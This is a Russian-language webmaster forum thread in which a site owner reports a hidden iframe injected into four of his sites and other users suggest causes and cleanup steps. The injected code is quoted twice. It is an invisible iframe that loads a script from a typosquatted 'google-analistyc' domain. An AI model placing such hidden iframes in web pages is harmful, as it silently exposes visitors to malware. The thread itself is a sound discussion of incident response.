Форум SAPE.RU - фишинг на сайте

Форум SAPE.RU (http://forum.sape.ru/index.php)

- Разработка и сопровождение сайтов (http://forum.sape.ru/forumdisplay.php?f=29)

- - фишинг на сайте (http://forum.sape.ru/showthread.php?t=30674)

фишинг на сайте

Вчера обнаружил случайно на 4х своих сайтах фишинговый фрейм:

Код:

<!-- ~ --><iframe src="http://google-analistyc.net/in.cgi?12" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Почистил. Странно, однако. Ладно бы на одном. Но на всех сайта в рамках акаунта. Это наводит на странные мысли. Может хостеру что-нибудь отписать по этому поводу? У меня сомнения,что дырка у меня.

Цитата:

Сообщение от Geser (Сообщение 439902)

Вчера обнаружил случайно на 4х своих сайтах фишинговый фрейм:

Код:

<!-- ~ --><iframe src="http://google-analistyc.net/in.cgi?12" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Сменить пароль на ftp, провериться свежим антивирусом.
Хостер кто? Серьёзный или школьник?

серьезный вроде. ht-systems

Цитата:

Сообщение от Geser (Сообщение 439910)

серьезный вроде. ht-systems

Значит ему можно не писать.
Проверяйте у себя.

Цитата:

Сообщение от Geser (Сообщение 439902)

Вчера обнаружил случайно на 4х своих сайтах фишинговый фрейм

По-моему понятие фишинга совсем другое.

Через фрейм в частности можно и фишингом заниматься. Но чаще так распространяют троянов.

Проверился - вирусов нет. Пароль сменил. Через пару часов этот фрейм появился везде опять.

Цитата:

Сообщение от Geser (Сообщение 440201)

Проверился - вирусов нет. Пароль сменил. Через пару часов этот фрейм появился везде опять.

Ищите лишние скрипты на сайте. Если шел залили, то теперь пока не найдете, так и будете с вирусней сидеть.

Ну и хостеру написать не помешает.

Вот из википеди определение:

Цитата:

Фи́шинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, например, от имени социальных сетей (Facebook, Вконтакте), банков (Ситибанк, Альфа-банк), прочих сервисов (Rambler, Mail.ru). В письме часто содержится прямая ссылка на сайт, внешне не отличимый от настоящего. Оказавшись на таком сайте, пользователь может сообщить мошенникам ценную информацию, позволяющую получить доступ к аккаунтам и банковским счетам.

Фишинг — одна из разновидностей социальной инженерии, основанная на незнании пользователями основ сетевой безопасности: в частности, многие не знают простого факта: сервисы не рассылают писем с просьбами сообщить свои учётные данные, пароль и прочее.

Для защиты от фишинга производители основных интернет-браузеров договорились о применении одинаковых способов информирования пользователей о том, что они открыли подозрительный сайт, который может принадлежать мошенникам. Новые версии браузеров уже обладают такой возможностью, которая соответственно именуется «антифишинг».

Цитата:

Сообщение от Geser (Сообщение 439902)

Не сомневайтесь, виноват только Ваш комп. Бяк антивирусник может и не найти. Так что лучший вариант, формат с и винду заново поставить, затем в касперском интернет-защиту и спам на максимум и никогда не сохранять в клиенте пароли с логинами.
Именно то, что все сайты одновременно заразились и указывает на заражение именно вашего компа.
Антивирусник не обнаружит, потому как само заражение идет уже из сети, с компа кража паролей только.